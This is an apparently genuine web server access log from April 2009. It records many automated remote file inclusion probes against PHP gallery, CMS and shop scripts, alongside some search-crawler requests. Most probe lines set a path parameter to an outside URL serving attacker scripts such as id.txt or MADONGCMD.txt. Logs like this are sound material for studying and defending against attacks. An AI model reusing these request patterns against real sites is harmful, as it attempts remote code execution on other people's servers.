81.12.13.152 - - [14/Apr/2009:22:06:26 -0500] "GET /logs/access_log.1235001600/includes/ktedit/toolbar.php?dirDepth=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
65.55.208.130 - - [14/Apr/2009:22:28:52 -0500] "GET /logs/access_log.1147046400 HTTP/1.1" 200 2152 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [14/Apr/2009:22:28:52 -0500] "GET /logs/access_log.1153699200 HTTP/1.1" 200 296 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [14/Apr/2009:22:28:55 -0500] "GET /logs/access_log.1226275200 HTTP/1.1" 200 177702 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
201.6.247.157 - - [14/Apr/2009:22:42:41 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
201.6.247.157 - - [14/Apr/2009:22:42:44 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
201.6.247.157 - - [14/Apr/2009:22:42:47 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
201.6.247.157 - - [14/Apr/2009:22:42:50 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
82.194.75.111 - - [14/Apr/2009:22:53:33 -0500] "GET /logs/access_log.1234137600//config/dbutil.bck.php?confdir=http://zargoon.misesajour.com/templates/id.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
82.194.75.111 - - [14/Apr/2009:22:53:33 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://zargoon.misesajour.com/templates/id.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
82.194.75.111 - - [14/Apr/2009:22:53:33 -0500] "GET //config/dbutil.bck.php?confdir=http://zargoon.misesajour.com/templates/id.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
65.55.208.130 - - [14/Apr/2009:22:54:20 -0500] "GET /logs/access_log.1196121600 HTTP/1.1" 200 2115 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [14/Apr/2009:22:54:20 -0500] "GET /logs/access_log.1139097600 HTTP/1.1" 200 1338 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [14/Apr/2009:22:54:22 -0500] "GET /logs/access_log.1174089600 HTTP/1.1" 200 3637 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [14/Apr/2009:22:54:23 -0500] "GET /logs/access_log.1220227200 HTTP/1.1" 200 12695 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
82.194.75.111 - - [14/Apr/2009:23:00:28 -0500] "GET /logs/access_log.1234137600//modules/vwar/admin/admin.php?vwar_root=http://zargoon.misesajour.com/templates/id.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.194.75.111 - - [14/Apr/2009:23:00:28 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://zargoon.misesajour.com/templates/id.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
82.194.75.111 - - [14/Apr/2009:23:00:28 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://zargoon.misesajour.com/templates/id.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
201.6.247.157 - - [14/Apr/2009:23:00:41 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
201.6.247.157 - - [14/Apr/2009:23:00:42 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
201.6.247.157 - - [14/Apr/2009:23:00:43 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
201.6.247.157 - - [14/Apr/2009:23:00:44 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
82.194.75.111 - - [14/Apr/2009:23:00:48 -0500] "GET /logs/access_log.1231977600//modules/vwar/admin/admin.php?vwar_root=http://zargoon.misesajour.com/templates/id.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.194.75.111 - - [14/Apr/2009:23:00:48 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://zargoon.misesajour.com/templates/id.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.194.75.111 - - [14/Apr/2009:23:00:54 -0500] "GET /logs/access_log.1231113600//modules/vwar/admin/admin.php?vwar_root=http://zargoon.misesajour.com/templates/id.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.194.75.111 - - [14/Apr/2009:23:01:03 -0500] "GET /logs/access_log.1232668800//modules/vwar/admin/admin.php?vwar_root=http://zargoon.misesajour.com/templates/id.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.194.75.111 - - [14/Apr/2009:23:01:03 -0500] "GET /logs/access_log.1232236800//modules/vwar/admin/admin.php?vwar_root=http://zargoon.misesajour.com/templates/id.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.194.75.111 - - [14/Apr/2009:23:01:03 -0500] "GET /logs/access_log.1234915200//modules/vwar/admin/admin.php?vwar_root=http://zargoon.misesajour.com/templates/id.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.194.75.111 - - [14/Apr/2009:23:01:03 -0500] "GET /logs/access_log.1233878400//modules/vwar/admin/admin.php?vwar_root=http://zargoon.misesajour.com/templates/id.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.194.75.111 - - [14/Apr/2009:23:01:27 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://zargoon.misesajour.com/templates/id.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.73.138.140 - - [14/Apr/2009:23:03:31 -0500] "GET /logs//index.php?cmd&file=http://www.iv.org.ua/id.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
69.73.138.140 - - [14/Apr/2009:23:03:31 -0500] "GET //index.php?cmd&file=http://www.iv.org.ua/id.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
88.84.128.40 - - [14/Apr/2009:23:05:47 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
88.84.128.40 - - [14/Apr/2009:23:05:48 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
81.21.69.179 - - [14/Apr/2009:23:14:58 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
81.21.69.179 - - [14/Apr/2009:23:14:58 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.21.69.179 - - [14/Apr/2009:23:14:58 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
81.21.69.179 - - [14/Apr/2009:23:14:58 -0500] "GET /logs/access_log.1233705600/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
88.84.128.40 - - [14/Apr/2009:23:15:34 -0500] "GET /logs//modules/xoopsgallery/errors.php?error=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
88.84.128.40 - - [14/Apr/2009:23:15:35 -0500] "GET //modules/xoopsgallery/errors.php?error=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
123.214.172.12 - - [14/Apr/2009:23:17:26 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.medijob.be/fx29id2.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
123.214.172.12 - - [14/Apr/2009:23:17:26 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.medijob.be/fx29id2.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
123.214.172.12 - - [14/Apr/2009:23:17:26 -0500] "GET /logs/access_log.1238112000//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.medijob.be/fx29id2.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
81.21.69.179 - - [14/Apr/2009:23:19:52 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.21.69.179 - - [14/Apr/2009:23:19:52 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
81.21.69.179 - - [14/Apr/2009:23:19:52 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
81.21.69.179 - - [14/Apr/2009:23:19:53 -0500] "GET /logs/access_log.1233705600/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
81.21.69.179 - - [14/Apr/2009:23:20:27 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.21.69.179 - - [14/Apr/2009:23:20:27 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
81.21.69.179 - - [14/Apr/2009:23:20:28 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
81.21.69.179 - - [14/Apr/2009:23:20:28 -0500] "GET /logs/access_log.1233705600/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
122.116.178.20 - - [14/Apr/2009:23:22:38 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.medijob.be/fx29id2.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
122.116.178.20 - - [14/Apr/2009:23:22:38 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.medijob.be/fx29id2.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
122.116.178.20 - - [14/Apr/2009:23:22:42 -0500] "GET /logs/access_log.1238112000//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.medijob.be/fx29id2.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
81.21.69.179 - - [14/Apr/2009:23:24:33 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.21.69.179 - - [14/Apr/2009:23:24:33 -0500] "GET /logs/access_log.1233705600/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
81.21.69.179 - - [14/Apr/2009:23:24:33 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
81.21.69.179 - - [14/Apr/2009:23:24:34 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
81.176.226.164 - - [14/Apr/2009:23:26:38 -0500] "GET /logs//modules/xoopsgallery/errors.php?error=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.176.226.164 - - [14/Apr/2009:23:26:38 -0500] "GET //modules/xoopsgallery/errors.php?error=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
210.118.194.225 - - [14/Apr/2009:23:27:13 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
210.118.194.225 - - [14/Apr/2009:23:27:13 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
210.118.194.225 - - [14/Apr/2009:23:27:13 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
210.118.194.225 - - [14/Apr/2009:23:27:47 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.189.26.116 - - [14/Apr/2009:23:27:49 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.26.116 - - [14/Apr/2009:23:27:49 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.189.26.116 - - [14/Apr/2009:23:27:49 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.189.26.116 - - [14/Apr/2009:23:28:03 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
195.144.11.175 - - [14/Apr/2009:23:29:12 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
195.144.11.175 - - [14/Apr/2009:23:29:12 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.144.11.175 - - [14/Apr/2009:23:29:12 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
195.144.11.175 - - [14/Apr/2009:23:29:17 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
195.144.11.175 - - [14/Apr/2009:23:29:41 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.144.11.175 - - [14/Apr/2009:23:29:41 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
195.144.11.175 - - [14/Apr/2009:23:29:41 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
195.144.11.175 - - [14/Apr/2009:23:29:46 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
84.54.137.9 - - [14/Apr/2009:23:34:46 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
84.54.137.9 - - [14/Apr/2009:23:34:46 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.54.137.9 - - [14/Apr/2009:23:34:46 -0500] "GET /logs/access_log.1238112000//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
84.54.137.9 - - [14/Apr/2009:23:34:52 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
84.54.137.9 - - [14/Apr/2009:23:34:52 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.54.137.9 - - [14/Apr/2009:23:34:52 -0500] "GET /logs/access_log.1238112000//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
195.144.11.175 - - [14/Apr/2009:23:35:16 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
195.144.11.175 - - [14/Apr/2009:23:35:16 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.144.11.175 - - [14/Apr/2009:23:35:16 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
195.144.11.175 - - [14/Apr/2009:23:35:20 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
195.144.11.175 - - [14/Apr/2009:23:35:33 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
195.144.11.175 - - [14/Apr/2009:23:35:33 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
195.144.11.175 - - [14/Apr/2009:23:35:33 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.144.11.175 - - [14/Apr/2009:23:35:38 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
202.53.250.25 - - [14/Apr/2009:23:35:52 -0500] "GET /logs//modules/xoopsgallery/errors.php?error=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.189.26.116 - - [14/Apr/2009:23:36:48 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.189.26.116 - - [14/Apr/2009:23:36:50 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.189.26.116 - - [14/Apr/2009:23:36:51 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.26.116 - - [14/Apr/2009:23:36:59 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
69.73.138.140 - - [14/Apr/2009:23:38:28 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.iv.org.ua/id.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
69.73.138.140 - - [14/Apr/2009:23:38:28 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.iv.org.ua/id.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
81.21.69.179 - - [14/Apr/2009:23:40:57 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
210.118.194.225 - - [14/Apr/2009:23:41:15 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
210.118.194.225 - - [14/Apr/2009:23:41:15 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
210.118.194.225 - - [14/Apr/2009:23:41:15 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
210.118.194.225 - - [14/Apr/2009:23:41:20 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
81.12.13.152 - - [14/Apr/2009:23:41:42 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hitler.h17.ru//flash/ck.gif?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.12.13.152 - - [14/Apr/2009:23:41:42 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hitler.h17.ru//flash/ck.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
93.164.123.218 - - [14/Apr/2009:23:42:15 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
93.164.123.218 - - [14/Apr/2009:23:42:15 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.84.157.44 - - [14/Apr/2009:23:44:17 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
88.84.157.44 - - [14/Apr/2009:23:44:17 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
88.84.157.44 - - [14/Apr/2009:23:44:31 -0500] "GET /logs/access_log.1234828800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.84.157.44 - - [14/Apr/2009:23:44:33 -0500] "GET /logs/access_log.1234915200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.12.13.152 - - [14/Apr/2009:23:46:49 -0500] "GET /logs/access_log.1234828800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
